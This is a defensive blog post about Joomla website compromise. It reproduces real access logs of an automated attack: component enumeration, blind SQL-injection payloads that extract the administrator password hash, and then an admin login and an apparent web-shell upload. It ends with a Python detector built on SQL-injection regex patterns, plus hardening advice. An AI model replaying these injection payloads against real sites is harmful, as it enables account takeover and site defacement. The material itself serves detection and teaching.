It is common for security to take a back seat in the maintenance of a company's corporate website, and the usual excuses get trotted out:
- It will never happen to us.
- There are millions of websites; why would anyone pick ours?
- There is nothing important on our website.
- Etc., etc.
Nothing could be further from the truth: there are plenty of malicious people interested in what a website can be used for. Visitors who believe the site is completely clean get infected with malicious code, or new links to fictitious products appear that redirect to other sites selling viagra, pills and the like, seriously damaging the reputation of the website and of the company, and even endangering relationships with customers who were infected through the site because the proper measures had not been taken.
A quick Google search is enough to check whether our site has been compromised with external links:
- site:***** (pharm|viagra)
Where ***** is our domain, for example inode64.com or villarrealcf.es.
Another way to detect whether we are being attacked is to analyse the web server's log records, as in this example:
- 79.142.73.67 - - [11/Apr/2012:05:29:04 +0200] "GET / HTTP/1.1" 200 152204 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:05 +0200] "GET /administrator/ HTTP/1.1" 200 7202 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:05 +0200] "GET /components/ HTTP/1.1" 200 47 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:05 +0200] "GET /modules/ HTTP/1.1" 200 44 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:05 +0200] "HEAD /index.php?option=com_virtuemart&view=siski HTTP/1.1" 303 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:05 +0200] "HEAD /index.php?option=wer_to_cailpso&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:06 +0200] "HEAD /index.php?option=com_realty&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:06 +0200] "HEAD /index.php?option=com_personal&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:06 +0200] "HEAD /index.php?option=com_xmap&view=siski HTTP/1.1" 200 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_rsgallery2&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_play&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_sport&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_etree&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_tag&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_adagency&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_storedirectory&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_myblog&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:11 +0200] "HEAD /index.php?option=com_tpjobs&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:11 +0200] "HEAD /index.php?option=com_rokmodule&view=siski HTTP/1.1" 200 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:11 +0200] "HEAD /index.php?option=com_jootags&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:11 +0200] "HEAD /index.php?option=com_ezautos&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:11 +0200] "HEAD /index.php?option=com_fastball&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:12 +0200] "HEAD /index.php?option=com_file&view=siski HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:12 +0200] "GET /administrator/index.php HTTP/1.1" 200 7202 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
We can see that the scan checks for a series of components known to have some security problem:
- xmap (CVE-2010-2678)
- rsgallery2 (CVE-2006-6962)
- Play
- Sport
- Etree
- Tag
- Adagency
- Storedirectory
- Myblog (CVE-2010-1540, CVE-2008-6193, CVE-2008-4341, ...)
- Tpjobs (CVE-2010-0981)
- rokmodule (CVE-2010-1479)
- jootags
- ezautos
- fastball
- file
- Google Maps (/plugins/system/plugin_googlemap2_proxy.php)
The first thing an attacker does is analyse the site, see which modules are installed and test whether the installed versions have known security problems; only then does the actual attack take place, to obtain administrator privileges and insert code into the site. Days or even months may pass between one phase and the next before the final attack is carried out. These attacks are normally run automatically, and once the data has been collected the sites with the greatest reach are picked out.
This example shows exactly that: here they found a component (com_rokmodule) with a security problem and exploited it to change the administrator's password.
- 79.142.73.67 - - [11/Apr/2012:05:29:12 +0200] "GET /index.php?option=com_xmap&sitemap=2&Itemid=-18 HTTP/1.1" 200 1280563 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:15 +0200] "GET /index.php?option=com_xmap&sitemap=2&Itemid=-18+union+select+0x666275616c6f6f6e66622d312d,0x666275616c6f6f6e66622d322d,0x666275616c6f6f6e66622d332d,0x666275616c6f6f6e66622d342d,0x666275616c6f6f6e66622d352d,0x666275616c6f6f6e66622d362d,0x666275616c6f6f6e66622d372d,0x666275616c6f6f6e66622d382d-- HTTP/1.1" 200 1281425 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:19 +0200] "GET /index.php?option=com_xmap&sitemap=2&Itemid=-18/*!union*//*!select*/0x666275616c6f6f6e66622d312d,0x666275616c6f6f6e66622d322d,0x666275616c6f6f6e66622d332d,0x666275616c6f6f6e66622d342d,0x666275616c6f6f6e66622d352d,0x666275616c6f6f6e66622d362d,0x666275616c6f6f6e66622d372d,0x666275616c6f6f6e66622d382d-- HTTP/1.1" 200 1281479 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:23 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2 HTTP/1.1" 200 1760 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:23 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2asd' HTTP/1.1" 200 1 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:23 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(1=1) HTTP/1.1" 200 1772 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:23 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(365=365) HTTP/1.1" 200 1776 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:23 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(365=944) HTTP/1.1" 200 1 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:23 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(substr(@@version,1,1)=3) HTTP/1.1" 200 1 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:24 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(substr(@@version,1,1)=4) HTTP/1.1" 200 1 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:24 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(substr(@@version,1,1)=5) HTTP/1.1" 200 1800 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:24 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(select(1)from(%23__users)having(min(1)=1)) HTTP/1.1" 200 1820 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:24 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(1=(/*!select*/length(COUNT(*))from(%23__users)+where+gid=25+having(min(1)=1))) HTTP/1.1" 200 1868 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:24 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(1=(/*!select*/substr(COUNT(*),1,1)from(%23__users)+where+gid=25+having(min(1)=1))) HTTP/1.1" 200 1872 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:24 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(1=(select+length(length(min(id)))+from(%23__users)+where+gid=25+and(id)between(1)and(99999)+having(min(1)=1))) HTTP/1.1" 200 1912 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:29:24 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(1=(/*!select*/substr(length(min(id)),1,1)from(%23__users)+where+gid=25+and(id)between(1)and(99999)+having(min(1)=1))) HTTP/1.1" 200 1 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- .
- .
- .
- .
- 79.142.73.67 - - [11/Apr/2012:05:32:13 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and((/*!select*/ord(substr(password,65,1))from(%23__users)+where+gid=25+and(id)between(1)and(99999)+having(min(1)=1))between(104)and(115)) HTTP/1.1" 200 1944 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:32:13 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and((/*!select*/ord(substr(password,65,1))from(%23__users)+where+gid=25+and(id)between(1)and(99999)+having(min(1)=1))between(104)and(110)) HTTP/1.1" 200 1944 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:32:14 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and((/*!select*/ord(substr(password,65,1))from(%23__users)+where+gid=25+and(id)between(1)and(99999)+having(min(1)=1))between(104)and(107)) HTTP/1.1" 200 1 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:32:14 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and((/*!select*/ord(substr(password,65,1))from(%23__users)+where+gid=25+and(id)between(1)and(99999)+having(min(1)=1))=108) HTTP/1.1" 200 1 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [11/Apr/2012:05:32:14 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and((/*!select*/ord(substr(password,65,1))from(%23__users)+where+gid=25+and(id)between(1)and(99999)+having(min(1)=1))=109) HTTP/1.1" 200 1920 "-" "Opera/9.80 (Windows NT 7.0; U; en) Presto/2.9.211 Version/12.00"
- 79.142.73.67 - - [24/Apr/2012:10:11:37 +0200] "GET /administrator/index.php HTTP/1.1" 200 7202 "-" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:37 +0200] "GET /administrator/index.php HTTP/1.1" 200 7202 "-" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:37 +0200] "POST /administrator/index.php HTTP/1.1" 303 - "http://XXXXXXX/administrator/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:37 +0200] "GET /administrator/index.php HTTP/1.1" 200 37703 "http://XXXXXXX/administrator/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:38 +0200] "GET /administrator/index.php?option=com_admin&task=sysinfo&view=sysinfo HTTP/1.1" 200 98320 "http://XXXXXXX/administrator/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:38 +0200] "GET /administrator/index.php?option=com_plugins&limit=0&limitstart=0&search=legacy HTTP/1.1" 200 29632 "http://XXXXXXX/administrator/index.php?option=com_admin&task=sysinfo&view=sysinfo" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:39 +0200] "GET /administrator/index.php?option=com_installer&element=component HTTP/1.1" 200 27745 "http://XXXXXXX/administrator/index.php?option=com_plugins&limit=0&limitstart=0&search=legacy" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:39 +0200] "POST /administrator/index.php HTTP/1.1" 200 27870 "http://XXXXXXX/administrator/index.php?option=com_installer&element=component" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:39 +0200] "GET /administrator/components/com_dlgu/adminko.php HTTP/1.1" 200 - "http://XXXXXXX/administrator/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
- 79.142.73.67 - - [24/Apr/2012:10:11:39 +0200] "GET /components/com_dlgu/bmgt.php HTTP/1.1" 200 20214 "-" "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
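The two traces above contain three things a defender can alert on from the access log alone: one IP requesting many distinct `option=com_*` values within seconds (extension enumeration), query strings carrying SQL-injection markers (`union select`, `/*!select*/` comment obfuscation, `substr`/`ord` character extraction, `@@version`, the Joomla `#__` table prefix that arrives as `%23__`), and a later POST to `/administrator/index.php` from the same address. The following Python script is an added example, not code from the original post: it parses Apache combined-format lines and applies those three rules. The log lines embedded in it are constructed to mirror the traces above, with RFC 5737 documentation addresses in place of the real one; the pattern list, the 60-second window and the five-component threshold are assumptions to tune for your own site.

```python
"""Detect extension enumeration, SQL-injection probing and a later administrator
login in Apache combined-format access logs.  Added example, not the post's code."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Apache "combined" format: ip ident user [ts] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Markers taken from the post's trace; the list is an assumption to tune per site.
SQLI_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"union\s+select",                    # UNION-based extraction
    r"/\*!\s*(union|select)\s*\*/",       # MySQL /*!...*/ comment obfuscation
    r"\b(substr|ord|length)\s*\(",        # character-by-character blind extraction
    r"@@version",                         # database fingerprinting
    r"#__",                               # Joomla table prefix (%23__ once decoded)
    r"\band\s*\(\s*\d+\s*=\s*\d+\s*\)",   # boolean tautology such as and(1=1)
)]

# Constructed sample log, modelled on the post's traces (documentation IPs, short UAs).
SAMPLE_LOG = """\
203.0.113.5 - - [11/Apr/2012:05:29:04 +0200] "GET / HTTP/1.1" 200 152204 "-" "Opera/9.80"
203.0.113.5 - - [11/Apr/2012:05:29:05 +0200] "HEAD /index.php?option=com_virtuemart&view=siski HTTP/1.1" 303 - "-" "Opera/9.80"
203.0.113.5 - - [11/Apr/2012:05:29:05 +0200] "HEAD /index.php?option=com_realty&view=siski HTTP/1.1" 404 - "-" "Opera/9.80"
203.0.113.5 - - [11/Apr/2012:05:29:06 +0200] "HEAD /index.php?option=com_personal&view=siski HTTP/1.1" 404 - "-" "Opera/9.80"
203.0.113.5 - - [11/Apr/2012:05:29:06 +0200] "HEAD /index.php?option=com_xmap&view=siski HTTP/1.1" 200 - "-" "Opera/9.80"
203.0.113.5 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_rsgallery2&view=siski HTTP/1.1" 404 - "-" "Opera/9.80"
203.0.113.5 - - [11/Apr/2012:05:29:10 +0200] "HEAD /index.php?option=com_play&view=siski HTTP/1.1" 404 - "-" "Opera/9.80"
203.0.113.5 - - [11/Apr/2012:05:29:11 +0200] "HEAD /index.php?option=com_rokmodule&view=siski HTTP/1.1" 200 - "-" "Opera/9.80"
203.0.113.5 - - [11/Apr/2012:05:29:11 +0200] "HEAD /index.php?option=com_myblog&view=siski HTTP/1.1" 404 - "-" "Opera/9.80"
198.51.100.7 - - [11/Apr/2012:05:29:12 +0200] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 31020 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Apr/2012:05:29:15 +0200] "GET /index.php?option=com_xmap&sitemap=2&Itemid=-18+union+select+0x31,0x32-- HTTP/1.1" 200 1281425 "-" "Opera/9.80"
203.0.113.5 - - [11/Apr/2012:05:29:24 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and(substr(@@version,1,1)=5) HTTP/1.1" 200 1800 "-" "Opera/9.80"
203.0.113.5 - - [11/Apr/2012:05:32:14 +0200] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=2+and((select+ord(substr(password,1,1))from(%23__users)+where+gid=25)=109) HTTP/1.1" 200 1920 "-" "Opera/9.80"
203.0.113.5 - - [24/Apr/2012:10:11:37 +0200] "POST /administrator/index.php HTTP/1.1" 303 - "http://example.com/administrator/index.php" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict for one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = unquote_plus(parts.query)            # %23 -> '#', '+' -> ' '
    rec["option"] = parse_qs(parts.query).get("option", [None])[0]
    return rec


def detect_enumeration(records, min_components=5, window=timedelta(seconds=60)):
    """Flag an IP that touches many distinct option=com_* values inside one window;
    the 404 count shows how many of the probed extensions were not installed."""
    by_ip = defaultdict(list)
    for r in records:
        if r["option"]:
            by_ip[r["ip"]].append(r)
    findings = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        for i, first in enumerate(recs):
            seen, not_found = set(), 0
            for r in recs[i:]:
                if r["ts"] - first["ts"] > window:
                    break
                seen.add(r["option"])
                not_found += r["status"] == 404
            if len(seen) >= min_components:
                findings.append({"rule": "component_enumeration", "ip": ip,
                                 "start": first["ts"], "components": sorted(seen),
                                 "not_found": not_found})
                break                      # one finding per IP is enough
    return findings


def detect_sqli(records):
    """Flag every request whose decoded query string matches an injection marker."""
    findings = []
    for r in records:
        hits = [p.pattern for p in SQLI_PATTERNS if p.search(r["query"])]
        if hits:
            findings.append({"rule": "sql_injection_probe", "ip": r["ip"], "ts": r["ts"],
                             "option": r["option"], "patterns": hits})
    return findings


def detect_admin_login_after_probe(records, probes):
    """Flag a POST to the administrator login, answered with a redirect as in the
    post's trace, from an IP that earlier sent SQL-injection probes."""
    first_probe = {}
    for p in probes:
        first_probe[p["ip"]] = min(p["ts"], first_probe.get(p["ip"], p["ts"]))
    findings = []
    for r in records:
        if (r["method"] == "POST" and r["path"] == "/administrator/index.php"
                and r["status"] in (301, 302, 303)
                and r["ip"] in first_probe and r["ts"] > first_probe[r["ip"]]):
            findings.append({"rule": "admin_login_after_sqli_probe", "ip": r["ip"],
                             "ts": r["ts"], "first_probe": first_probe[r["ip"]]})
    return findings


def analyze(lines):
    """Run the three rules over raw log lines; returns findings grouped by rule."""
    records = [r for r in map(parse_line, lines) if r]
    sqli = detect_sqli(records)
    return {"enumeration": detect_enumeration(records),
            "sqli": sqli,
            "admin_login": detect_admin_login_after_probe(records, sqli)}


if __name__ == "__main__":
    for rule, items in analyze(SAMPLE_LOG.splitlines()).items():
        for f in items:
            print(rule, f["ip"], f.get("start") or f["ts"], f.get("option") or "")
```

On the constructed sample the script reports one enumeration finding for 203.0.113.5 (eight distinct components probed in twenty seconds, five of them answered 404), three injection probes, and the administrator login thirteen days later from the same address. In production you would feed it `access_log` line by line and, as the post notes, treat the gap between the probe and the login as normal: the correlation rule deliberately has no upper time bound.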
As a final recommendation, review the site and remove any modules, components, plugins and even templates that are not in use; then check that those that remain installed are the latest version and have no reported security problems. In Joomla 2.5 and later, updates are easier to manage, but be careful if the code was modified, because the update could leave the site inoperative. It is also advisable to look for a security expert or to talk to the professionals who built the site.
Continue reading Part 2.